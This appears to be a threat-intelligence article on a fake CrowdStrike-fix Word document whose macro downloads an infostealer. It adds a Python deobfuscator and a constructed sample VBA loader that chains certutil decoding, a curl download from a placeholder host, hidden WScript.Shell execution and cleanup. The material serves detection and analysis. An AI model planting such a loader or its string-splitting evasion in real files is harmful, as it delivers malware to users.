ThreatLabz has reported that attackers are using the recent CrowdStrike bug, which left many Windows machines crashing with a Blue Screen of Death (BSOD), as a lure to distribute malware through a counterfeit Microsoft Word document.
Nothing in CrowdStrike itself is being exploited here: the document claims to contain instructions for fixing the BSOD, but in reality it carries malicious code.
When users open it and enable macros, it downloads an information-stealing program from the internet and runs it.

However, the document contains a concealed macro: a small VBA program that runs as soon as the document is opened with macros enabled.
Here's a detailed breakdown of what the macro does:
Setting Up Variables: The macro first defines variables holding temporary-file paths and the URLs it will download from. The file names it uses, curl.txt, curl.exe, mscorsvc.txt and mscorsvc.dll, are chosen to look like ordinary Windows and .NET components so that they blend in with genuine system files.
Building Commands: The macro then assembles a command line for the Windows command prompt (cmd.exe) that relies on two utilities: certutil and curl. The curl.txt/curl.exe pairing indicates that certutil's -decode function is used to turn a Base64-encoded text file back into the curl executable, which then fetches the payload; the mscorsvc.txt/mscorsvc.dll pairing suggests the same decoding step for the payload.
Executing Commands: The macro hands the assembled string to WScript.Shell, which runs it; the downloaded payload is then launched on the computer.
Cleaning Up: Once the payload is running, the macro deletes its staging files, such as curl.exe and curl.txt. This removes the most obvious artefacts and makes the incident harder for users and security software to spot, although it does not remove the decoded DLL, the document itself, or the process-creation telemetry (Word spawning cmd.exe) that endpoint tooling records.
Once the payload is running, it starts to harvest information from the compromised computer.
The stolen data is sent to the attacker's server in HTTP POST requests to 172.104.160[.]126:5000. Because the traffic looks like ordinary web requests it can pass unnoticed, but a POST to a bare IP address on port 5000 is a strong network indicator, and blocking or alerting on connections to that address is a simple first response.
The attackers employ several techniques to conceal their activity. By relying on legitimate tools such as certutil and curl, a "living off the land" approach, their commands look like routine administration rather than malware.
They also break up suspicious strings with concatenation in the macro source, so a scanner searching for literal keywords such as "certutil" or "WScript.Shell" may not find them. Together these methods help the macro slip past signature-based security software.
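To make the macro breakdown and the string-concatenation trick concrete, here is an added Python example written for this page; it is not code from ThreatLabz, CrowdStrike or the malware itself. It takes a constructed VBA fragment that imitates the behaviour described above (the variable names t, c and s, the placeholder URL http://example.invalid/p, the window-style argument 0, and the omission of the line that drops curl.txt are all assumptions), folds Chr() calls and "a" & "b" concatenations back into single literals, tracks variable assignments so the final command line handed to WScript.Shell can be recovered, and then runs simple indicator checks over the result.

```python
import re
from typing import Dict, List

# Constructed VBA fragment written for this example to imitate the behaviour described
# above. It is NOT the real macro: the URL is a placeholder, the variable names are
# assumed, and the line that drops curl.txt (a Base64 blob) is omitted.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim t As String, c As String
    t = Environ("TEMP")
    c = "cmd /c " & "cert" & "util" & " -decode " & t & "\curl.txt " & t & "\curl.exe"
    c = c & " && " & t & "\cur" & "l.exe -o " & t & "\mscorsvc.txt http://" & "example.invalid/p"
    c = c & " && " & Chr(99) & Chr(101) & Chr(114) & Chr(116) & "util -decode " & t & "\mscorsvc.txt " & t & "\mscorsvc.dll"
    Set s = CreateObject("WScript" & "." & "Shell")
    s.Run c, 0
    Kill t & "\curl.exe"
    Kill t & "\curl.txt"
End Sub
'''

CHR_RE = re.compile(r'\bChrW?\(\s*(\d+)\s*\)')
ENV_RE = re.compile(r'\bEnviron\("([^"]+)"\)')
# Two adjacent string literals joined by & (or +): "a" & "b"
CONCAT_RE = re.compile(r'"((?:[^"]|"")*)"\s*[&+]\s*"((?:[^"]|"")*)"')
# A literal, a call name (identifier followed by "("), a plain identifier, or a paren
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)(?=\s*\()|([A-Za-z_]\w*)|([()])')
ASSIGN_RE = re.compile(r'^\s*(?:Set\s+)?(\w+)\s*=\s*(.+?)\s*$')
RUN_RE = re.compile(r'^\s*(\w+)\.Run\s+(.+?)\s*$')
KILL_RE = re.compile(r'^\s*Kill\s+(.+?)\s*$')

INDICATORS = {
    "certutil_decode": re.compile(r"\bcertutil\b.*-decode", re.I),
    "curl_download": re.compile(r"\bcurl(?:\.exe)?\b.*\s-o\s", re.I),
    "temp_dir_staging": re.compile(r"%TEMP%", re.I),
    "wscript_shell": re.compile(r"WScript\.Shell", re.I),
}


def fold_literals(line: str) -> str:
    """Rewrite Chr(n) and Environ() as literals, then merge "a" & "b" into "ab" until stable."""
    line = CHR_RE.sub(lambda m: '"' + chr(int(m.group(1))).replace('"', '""') + '"', line)
    line = ENV_RE.sub(lambda m: '"%' + m.group(1) + '%"', line)
    prev = None
    while prev != line:
        prev = line
        line = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', line)
    return line


def resolve(expr: str, env: Dict[str, str]) -> str:
    """Concatenate the literals and known variables in a folded expression."""
    parts: List[str] = []
    for m in TOKEN_RE.finditer(expr):
        lit, call, var, paren = m.groups()
        if lit is not None:
            parts.append(lit.replace('""', '"'))
        elif call:
            parts.append(call)                            # keep function names as-is
        elif var:
            parts.append(env.get(var, "<" + var + ">"))  # unknown variables stay visible
        else:
            parts.append(paren)
    return "".join(parts)


def split_args(expr: str) -> List[str]:
    """Split a VBA argument list on commas that are outside string literals."""
    args, cur, in_str = [], [], False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch == "," and not in_str:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    args.append("".join(cur).strip())
    return args


def analyze(src: str) -> Dict[str, object]:
    """Recover variable values, executed commands and deleted files, then flag indicators."""
    env: Dict[str, str] = {}
    commands: List[Dict[str, object]] = []
    deleted: List[str] = []
    for raw in src.splitlines():
        line = fold_literals(raw)
        if m := ASSIGN_RE.match(line):
            env[m.group(1)] = resolve(m.group(2), env)
        elif m := RUN_RE.match(line):
            args = split_args(m.group(2))
            commands.append({
                "via": env.get(m.group(1), m.group(1)),
                "command": resolve(args[0], env),
                "hidden_window": len(args) > 1 and args[1] == "0",  # Run window style 0 = hidden
            })
        elif m := KILL_RE.match(line):
            deleted.append(resolve(m.group(1), env))
    blob = "\n".join(list(env.values()) + [str(c["command"]) for c in commands] + deleted)
    hits = {name for name, rx in INDICATORS.items() if rx.search(blob)}
    if any(c["hidden_window"] for c in commands):
        hits.add("hidden_window")
    if deleted:
        hits.add("cleanup_kill")
    return {"variables": env, "commands": commands, "deleted": deleted, "indicators": sorted(hits)}


if __name__ == "__main__":
    report = analyze(SAMPLE_MACRO)
    for cmd in report["commands"]:
        print("runs via", cmd["via"], "(hidden window)" if cmd["hidden_window"] else "(visible window)")
        print("  ", cmd["command"])
    print("deletes:", report["deleted"])
    print("indicators:", report["indicators"])
```

The point of folding before matching is that none of the indicator patterns would hit the raw source: "certutil" is split into "cert" & "util" or spelled out with Chr(), and "WScript.Shell" is assembled from three pieces. Once the concatenations are collapsed and the variables resolved, the full cmd.exe command line, the hidden-window flag and the Kill targets are visible in one place, which is what an analyst or a macro scanner actually needs to act on.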